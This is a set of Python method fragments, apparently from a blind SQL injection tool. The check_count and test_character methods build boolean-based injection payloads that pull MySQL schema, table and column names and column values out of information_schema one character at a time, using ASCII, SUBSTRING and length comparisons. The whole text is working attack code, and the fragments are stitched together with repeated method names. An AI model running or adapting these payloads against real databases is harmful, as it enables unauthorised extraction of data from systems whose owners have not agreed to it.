def check_count(self, count, operation=">="): injection_string = "(SELECT count(*) from information_schema.SCHEMATA)%s%d" % ( operation, count) return core.check_truth(injection_string)
def test_character(self, character, position, operation=">="): injection_string = "(SELECT ROUND(length(group_concat(schema_name)) - length(replace(group_concat(schema_name), ',','')) + 1) , FROM (SELECT SCHEMA_NAME from information_schema.SCHEMATA LIMIT %d,1) as temp where ASCII(SUBSTRING(SCHEMA_NAME, %d, 1))%s%d)" % ( self.index - 1, position, operation, character) return core.check_truth(injection_string)
def test_character(self, character, position, operation=">="): injection_string = "(SELECT count(*) FROM (SELECT %s from %s.%s LIMIT %d,1) as temp where ASCII(SUBSTRING(%s, %d, 1))%s%d)" % ( self.column, self.database, self.table, self.index - 1, self.column, position, operation, character) return core.check_truth(injection_string)
def check_count(self, count, operation=">="): injection_string = "(SELECT count(*) FROM (SELECT SCHEMA_NAME from information_schema.SCHEMATA LIMIT %d,1) as temp where length(SCHEMA_NAME)%s%d)" % ( self.index - 1, operation, count) return core.check_truth(injection_string)
def check_count(self, count, operation=">="): injection_string = "(SELECT count(*) FROM (SELECT %s from %s.%s LIMIT %d,1) as temp where length(%s)%s%d)" % ( self.column, self.database, self.table, self.index - 1, self.column, operation, count) return core.check_truth(injection_string)
def check_count(self, count, operation=">="): injection_string = "(SELECT count(%s) from %s.%s)%s%d" % ( self.column, self.database, self.table, operation, count) return core.check_truth(injection_string)
def test_character(self, character, position, operation=">="): injection_string = "(SELECT count(*) FROM (SELECT TABLE_SCHEMA,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=%s LIMIT %d,1) " \ "as temp where ASCII(SUBSTRING(TABLE_NAME, %d, 1))%s%d)" % \ (core.char_array(self.database), self.index - 1, position, operation, character) return core.check_truth(injection_string)
def check_count(self, count, operation=">="): injection_string = "(SELECT count(*) from information_schema.TABLES where TABLE_SCHEMA=%s)%s%d" %\ (core.char_array(self.database), operation, count) return core.check_truth(injection_string)
def check_count(self, count, operation=">="): injection_string = "(SELECT count(*) FROM (SELECT TABLE_SCHEMA,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=%s LIMIT %d,1) " \ "as temp where length(TABLE_NAME)%s%d)" %\ (core.char_array(self.database), self.index - 1, operation, count) return core.check_truth(injection_string)
def test_character(self, character, position, operation=">="): injection_string = "(SELECT count(*) FROM (SELECT TABLE_SCHEMA,TABLE_NAME, COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=%s and TABLE_NAME=%s ORDER BY ORDINAL_POSITION LIMIT %d,1) " \ "as temp where ASCII(SUBSTRING(COLUMN_NAME, %d, 1))%s%d)" % \ (core.char_array(self.database), core.char_array(self.table), self.index - 1, position, operation, character) return core.check_truth(injection_string)
def check_count(self, count, operation=">="): injection_string = "(SELECT count(*) FROM (SELECT TABLE_SCHEMA,TABLE_NAME, COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=%s and TABLE_NAME=%s ORDER BY ORDINAL_POSITION LIMIT %d,1) " \ "as temp where length(COLUMN_NAME)%s%d)" %\ (core.char_array(self.database), core.char_array(self.table), self.index - 1, operation, count) return core.check_truth(injection_string)